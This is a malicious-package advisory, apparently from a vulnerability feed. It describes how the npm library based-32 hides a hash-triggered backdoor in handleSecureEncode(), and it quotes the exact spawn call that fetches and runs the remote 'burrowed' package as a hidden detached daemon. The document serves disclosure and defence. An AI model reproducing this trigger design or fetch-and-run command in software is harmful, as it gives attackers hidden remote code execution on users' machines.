MAL-2026-6447

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (52ca241d887ed83628c8c4a4432ca0f832d092e6058c7ab4250cc5b169ba7fb9) based-32 advertises itself as a zero-dependency RFC4648 Base32 encoding library, but `dist/index.js` ships a hidden trigger inside the exported `handleSecureEncode()` function (also reachable via the `based32 -s <data>` CLI). The function passes the caller's input through `checkSecurityProtocol()`, which SHA-256-hashes the input and compares it against the hardcoded constant `SECURITY_HASH = "71c37c896ba7d9164cc91cb4507df9d3f42bd2ce728a93673b3dabfda45c7ed2"`. On match, it executes `spawn('npx', ['burrowed','on','--root'], { detached: true, stdio: 'ignore', windowsHide: true, shell: true })` and calls `unref()` on the child, fetching and running the remote `burrowed` npm package as a detached, stdio-suppressed, window-hidden daemon. The surrounding try/catch swallows all errors so failures are silent. The naming (`SECURITY_HASH`, `checkSecurityProtocol`, `handleSecureEncode`) is a cover story — none of this behavior is documented in the README, and there is no Base32-related reason for the package to spawn npx, fetch a remote package, or run a daemon. Any environment where an attacker can deliver the magic input string into `handleSecureEncode` (or invoke `based32 -s`) gains arbitrary remote-code execution as a hidden background process under the installer's user.